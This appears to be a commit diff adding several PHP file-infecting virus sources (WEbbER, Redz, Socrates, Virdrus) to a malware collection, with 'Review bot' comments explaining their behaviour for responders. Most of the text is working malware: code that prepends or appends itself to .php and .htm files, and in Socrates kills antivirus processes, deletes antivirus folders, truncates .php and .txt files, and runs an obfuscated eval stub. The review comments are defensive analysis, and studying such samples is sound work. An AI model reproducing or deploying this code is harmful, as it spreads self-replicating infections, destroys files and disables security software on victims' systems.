//[WEbbER] by MI_pirat
//Copyright (C) 2002 [Red-Cell] inc.
$c = "";
//Get the virus from the host file
$f = fopen (__FILE__, "r");
$c = fread ($f, filesize (__FILE__));
fclose ($f);
$c = substr($c,0,866);
//Search for files to infect
$handle=opendir('.');
while (($file = readdir($handle))!==false) {
if ($file != "." && $file != "..")
{
$s = substr($file, -3);
//If not infected yet, infect it!
if ($s=="php")
{
$g = fopen ($file, "r");
$cont = fread ($g,filesize ($file));
fclose ($g);
if (!strstr($cont,"[WEbbER]")) //check the signature
{
unlink("$file"); //delete and prepend the virus
$g = fopen ($file, "a+");
fwrite ($g,"$c");
fwrite ($g,"\n");
fwrite ($g,substr($cont,5)); //append the original file
fclose ($g);
}
}
}
}
closedir($handle);
}
webb();
?>
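Review bot: `webb()` does not patch hosts in place: it calls `unlink("$file")`, recreates the file, writes the first 866 bytes of the carrier and then `substr($cont,5)`, so the first five bytes of every host are discarded and the result is a newly created file (new creation time, and on POSIX systems a new inode). For responders that means file-integrity monitoring will see a delete-and-create rather than a modify, and a host that did not begin with exactly `<?php` cannot be restored by stripping the prefix alone. I would document this in the header, e.g. `// Prepender: host is deleted and rewritten as carrier[0:866] + "\n" + host[5:]; marker "[WEbbER]"`. Virus.PHP.Virdrus follows the same routine with a 2048-byte prefix and the marker `[VirusQuest]`.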

31
PHP/Virus.PHP.Redz Normal file
View File

@ -0,0 +1,31 @@
<?php
$handle=opendir('.');
while ($file = readdir($handle))
{ $inf_=true;
$ext_=false;
if ( ($ext_ = strstr ($file, '.php')) || ($ext_ = strstr ($file, '.htm')) || ($ext_ = strstr ($file, '.html')) )
if ( is_file($file) && is_writeable($file) )
{
$host = fopen($file, "r");
$contents = fread ($host, filesize ($file));
$sig = strstr ($contents, 'redz.php');
if(!$sig) $inf_=false;
}
if (($inf_==false))
{
$host = fopen($file, "a");
fputs($host,"<?php ");
fputs($host,"include(\"");
fputs($host,__FILE__);
fputs($host,"\"); ");
fputs($host,"?>");
fclose($host);
return;
}
}
closedir($handle);
?>

174
PHP/Virus.PHP.Socrate.a Normal file

@ -0,0 +1,174 @@
<?php
echo("PHP.Socrates by synged flesh"."<br>"."The only true wisdom is in knowing you know nothing.");
$decrypt=
"function SocratesDecrypt(\$string,\$key)\r\n"
."{ \r\n"
." \$codez=''; \r\n"
." for(\$i=0; \$i<strlen(\$string); \$i++)\r\n"
." { \r\n"
." \$value=ord(\$string[\$i]); \r\n"
." \$valuez=\$value+\$key; \r\n"
." \$codez.=chr(\$valuez); \r\n"
." } \r\n"
." return \$codez; \r\n"
." } \r\n"
."\$filez = \$_SERVER[\"SCRIPT_NAME\"];\r\n"
."\$break = Explode('/', \$filez); \r\n"
."\$pfile = \$break[count(\$break) - 1];\r\n"
."\$c = fopen(\$pfile,'rb');\r\n"
."\$d = fread(\$c,filesize(\$pfile));\r\n"
."fclose(\$c);\r\n"
."\$next=strlen(\$d)-693;\r\n"
."\$virus=substr(\$d,687,\$next);\r\n"
."\$vr=SocratesDecrypt(\$virus,'1');\r\n"
."eval(\$vr);";
function SocratesCrypt($string,$key)
{
$codez="";
for($i=0; $i<strlen($string); $i++)
{
$value=ord($string[$i]);
$valuez=$value-$key;
$codez.=chr($valuez);
}
return $codez;
}
if(is_dir("C:\Program Files\Norton*"))
{
exec("taskkill /f /t /im nod32.exe");
rmdir("C:\Program Files\Norton*");
}
if(is_dir("C:\Program Files\McAfee*"))
{
exec("taskkill /f /t /im Mcshield.exe");
rmdir("C:\Program Files\McAfee*");
}
if(is_dir("C:\Program Files\Kaspersky*"))
{
exec("taskkill /f /t /im KAV.exe");
rmdir("C:\Program Files\Kaspersky*");
}
$filez = $_SERVER["SCRIPT_NAME"];
$break = Explode('/', $filez);
$pfile = $break[count($break) - 1];
$c = fopen($pfile,'rb');
$d = fread($c,filesize($pfile));
fclose($c);
$nextsize=strlen($d)-4;
$virus=(substr($d,7,$nextsize));
$dir=opendir('*.*');
while (($file = readdir($dir)) !== false)
{
if (strstr($file,'.php'))
{
$f = fopen($file,'rb');
$contents = fread($f, filesize($file));
if (!strstr($contents, 'Socrates'))
{
if(!file_exists("Socrates.php")) {
fclose($f);
$g = fopen($file,'w');
fwrite($g,$d);
fclose($g);
}
if(file_exists("Socrates.php"))
{
fclose($f);
$g = fopen($file,'w');
fwrite($g,'<?php'.chr(13).chr(10).$decrypt.'/*'.SocratesCrypt($virus,'1').'*/'.'?>');
fclose($g);
}
}
}
if (strstr($file,'.txt'))
{
$f = fopen($file,'w');
fwrite($f,"Let him that would move the world, first move himself.");
}
}?>
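Review bot: Unlike the appenders and prependers in this commit, the infection loop opens each target with `fopen($file,'w')`, so the host's original content is truncated and replaced, and every `.txt` name it encounters is overwritten with a fixed sentence; nothing in the file warns that affected copies are unrecoverable without backups. The script also shells out with `exec("taskkill /f /t /im …")` against security-product process names, and the stub it writes runs its decoded body through `eval($vr)`. I would add `// Destructive: .php and .txt targets are truncated (mode 'w'); spawns taskkill; stub decodes its body and eval()s it`. A web-server or PHP worker process launching `taskkill` is a high-signal event to alert on, and listing `exec` in `disable_functions` for web-facing PHP removes that path.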

44
PHP/Virus.PHP.Virdrus Normal file

@ -0,0 +1,44 @@
<?php
function virusquest()
{
// Virus: VirusQuest
// Written by Dr Virus Quest
// Created on 08/09/2003
$c = "";
$f = fopen (__FILE__, "r");
$c = fread ($f, filesize (__FILE__));
fclose ($f);
$c = substr($c,0,2048);
$handle=opendir('.');
while (($file = readdir($handle))!==false) {
if ($file != "." && $file != "..")
{
$s = substr($file, -3);
if ($s=="php")
{
$g = fopen ($file, "r");
$cont = fread ($g,filesize ($file));
fclose ($g);
if (!strstr($cont,"[VirusQuest]"))
{
unlink("$file");
$g = fopen ($file, "a+");
fwrite ($g,"$c");
fwrite ($g,"\n");
fwrite ($g,"Virus: VirusQuest\n");
fwrite ($g,"Written by Dr Virus Quest\n");
fwrite ($g,"Created on 08/09/2003\n");
fwrite ($g,"\n");
fwrite ($g,substr($cont,5));
fclose ($g);
}
}
}
}
closedir($handle);
}
virusquest();
?>